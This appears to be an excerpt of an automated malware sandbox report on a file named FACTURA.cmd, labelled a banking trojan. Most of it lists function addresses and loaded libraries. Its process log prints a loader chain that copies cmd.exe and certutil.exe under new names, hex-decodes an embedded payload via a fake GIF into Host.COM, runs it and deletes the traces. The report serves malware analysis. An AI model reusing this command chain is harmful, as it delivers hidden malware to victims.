Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07B9BC8	6_2_00007FF7E07B9BC8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07FDBF0	6_2_00007FF7E07FDBF0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0843C10	6_2_00007FF7E0843C10
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E085BB28	6_2_00007FF7E085BB28
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E083FB50	6_2_00007FF7E083FB50
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0827B74	6_2_00007FF7E0827B74
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0801B84	6_2_00007FF7E0801B84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E079FB84	6_2_00007FF7E079FB84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07ABCA4	6_2_00007FF7E07ABCA4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C9CD0	6_2_00007FF7E07C9CD0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0859CC0	6_2_00007FF7E0859CC0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07EBCE8	6_2_00007FF7E07EBCE8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07A5D08	6_2_00007FF7E07A5D08
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07CFC20	6_2_00007FF7E07CFC20
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07EFC34	6_2_00007FF7E07EFC34
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07E3C60	6_2_00007FF7E07E3C60
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E089FC90	6_2_00007FF7E089FC90
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0811C90	6_2_00007FF7E0811C90
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E082BDA0	6_2_00007FF7E082BDA0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07A1DE8	6_2_00007FF7E07A1DE8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C5DF7	6_2_00007FF7E07C5DF7
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07CDD20	6_2_00007FF7E07CDD20
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0847D70	6_2_00007FF7E0847D70
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F1D70	6_2_00007FF7E07F1D70
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07E9D6C	6_2_00007FF7E07E9D6C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E089DD84	6_2_00007FF7E089DD84
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07EDEA4	6_2_00007FF7E07EDEA4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081DEB0	6_2_00007FF7E081DEB0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07E1ED0	6_2_00007FF7E07E1ED0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0819EE4	6_2_00007FF7E0819EE4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0825F04	6_2_00007FF7E0825F04
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0821E2C	6_2_00007FF7E0821E2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081BE70	6_2_00007FF7E081BE70
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0849FF8	6_2_00007FF7E0849FF8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0791F80	6_2_00007FF7E0791F80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07FC0B8	6_2_00007FF7E07FC0B8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F8018	6_2_00007FF7E07F8018
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07C8080	6_2_00007FF7E07C8080
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0862084	6_2_00007FF7E0862084
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02DF20C4	9_2_02DF20C4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793757854	10_2_00007FF793757854
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7937537D8	10_2_00007FF7937537D8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793743410	10_2_00007FF793743410
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF79374AA54	10_2_00007FF79374AA54
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793748DF8	10_2_00007FF793748DF8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793755554	10_2_00007FF793755554
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7937518D4	10_2_00007FF7937518D4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF79374B0D8	10_2_00007FF79374B0D8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793748510	10_2_00007FF793748510
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793742C48	10_2_00007FF793742C48
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF79376AC4C	10_2_00007FF79376AC4C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793741884	10_2_00007FF793741884
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF79376AFBC	10_2_00007FF79376AFBC
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793746BE0	10_2_00007FF793746BE0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF79374372C	10_2_00007FF79374372C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793749B50	10_2_00007FF793749B50
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793745B70	10_2_00007FF793745B70
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793743F90	10_2_00007FF793743F90
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793746EE4	10_2_00007FF793746EE4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793767F00	10_2_00007FF793767F00
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793754224	10_2_00007FF793754224
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793742220	10_2_00007FF793742220
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793744A30	10_2_00007FF793744A30
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF79376AA30	10_2_00007FF79376AA30
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793745240	10_2_00007FF793745240
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793747650	10_2_00007FF793747650
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF79374D250	10_2_00007FF79374D250
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793749E50	10_2_00007FF793749E50
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793750A6C	10_2_00007FF793750A6C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF79374E680	10_2_00007FF79374E680
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF79376EE88	10_2_00007FF79376EE88
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7937481D4	10_2_00007FF7937481D4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF79376D9D0	10_2_00007FF79376D9D0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF79374CE10	10_2_00007FF79374CE10
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793747D30	10_2_00007FF793747D30
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793771538	10_2_00007FF793771538
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793757854	11_2_00007FF793757854
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7937537D8	11_2_00007FF7937537D8
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793743410	11_2_00007FF793743410
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF79374AA54	11_2_00007FF79374AA54
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793748DF8	11_2_00007FF793748DF8
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793755554	11_2_00007FF793755554
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7937518D4	11_2_00007FF7937518D4
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF79374B0D8	11_2_00007FF79374B0D8
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793748510	11_2_00007FF793748510
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793742C48	11_2_00007FF793742C48
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF79376AC4C	11_2_00007FF79376AC4C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793741884	11_2_00007FF793741884
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF79376AFBC	11_2_00007FF79376AFBC
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793746BE0	11_2_00007FF793746BE0
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF79374372C	11_2_00007FF79374372C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793749B50	11_2_00007FF793749B50
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793745B70	11_2_00007FF793745B70
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793743F90	11_2_00007FF793743F90
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793746EE4	11_2_00007FF793746EE4
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793767F00	11_2_00007FF793767F00
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793754224	11_2_00007FF793754224
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793742220	11_2_00007FF793742220
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793744A30	11_2_00007FF793744A30
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF79376AA30	11_2_00007FF79376AA30
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793745240	11_2_00007FF793745240
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793747650	11_2_00007FF793747650
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF79374D250	11_2_00007FF79374D250
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793749E50	11_2_00007FF793749E50
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793750A6C	11_2_00007FF793750A6C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF79374E680	11_2_00007FF79374E680
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF79376EE88	11_2_00007FF79376EE88
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7937481D4	11_2_00007FF7937481D4
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF79376D9D0	11_2_00007FF79376D9D0
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF79374CE10	11_2_00007FF79374CE10
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793747D30	11_2_00007FF793747D30
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793771538	11_2_00007FF793771538

Found potential string decryption / allocating functions

Source: C:\Users\Public\Libraries\Host.COM	Code function: String function: 02DF44DC appears 74 times
Source: C:\Users\Public\Libraries\Host.COM	Code function: String function: 02E08954 appears 56 times
Source: C:\Users\Public\Libraries\Host.COM	Code function: String function: 02DF46D4 appears 244 times
Source: C:\Users\Public\Libraries\Host.COM	Code function: String function: 02DF4500 appears 33 times
Source: C:\Users\Public\Libraries\Host.COM	Code function: String function: 02DF4860 appears 949 times
Source: C:\Users\Public\Libraries\Host.COM	Code function: String function: 02E089D8 appears 45 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF793753448 appears 72 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF79375498C appears 40 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF79375081C appears 36 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF7E089F11C appears 37 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF7E089F1B8 appears 183 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF7E0857BAC appears 34 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF7E079D1C8 appears 41 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF7E082EB98 appears 93 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF7E08A64A6 appears 173 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF7E084ABFC appears 818 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF7E0850D10 appears 181 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF7E0857D70 appears 35 times
Source: C:\Users\Public\kn.exe	Code function: String function: 00007FF7E07CBC9C appears 280 times

Source: classification engine

Classification label: mal100.bank.troj.evad.winCMD@22/11@1/1

Source: C:\Users\Public\alpha.exe

3_2_00007FF7937432B0

Source: C:\Users\Public\kn.exe

6_2_00007FF7E087826C

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF79376FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,

3_2_00007FF79376FB54

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF7E08841E0 _wcsnicmp,CoCreateInstance,#357,

6_2_00007FF7E08841E0

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF7E0856320 FindResourceW,GetLastError,#357,LoadResource,GetLastError,LockResource,GetLastError,

6_2_00007FF7E0856320

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\alpha.exe

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7436:120:WilError_03

Source: C:\Users\Public\Libraries\Host.COM	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales			Jump to behavior

Source: C:\Windows\System32\extrac32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: FACTURA.cmd	ReversingLabs: Detection: 33%
Source: FACTURA.cmd	Virustotal: Detection: 34%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\FACTURA.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\Host.COM C:\Users\Public\Libraries\Host.COM
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\Host.COM C:\Users\Public\Libraries\Host.COM	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10	Jump to behavior

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Section loaded: amsi.dll	Jump to behavior
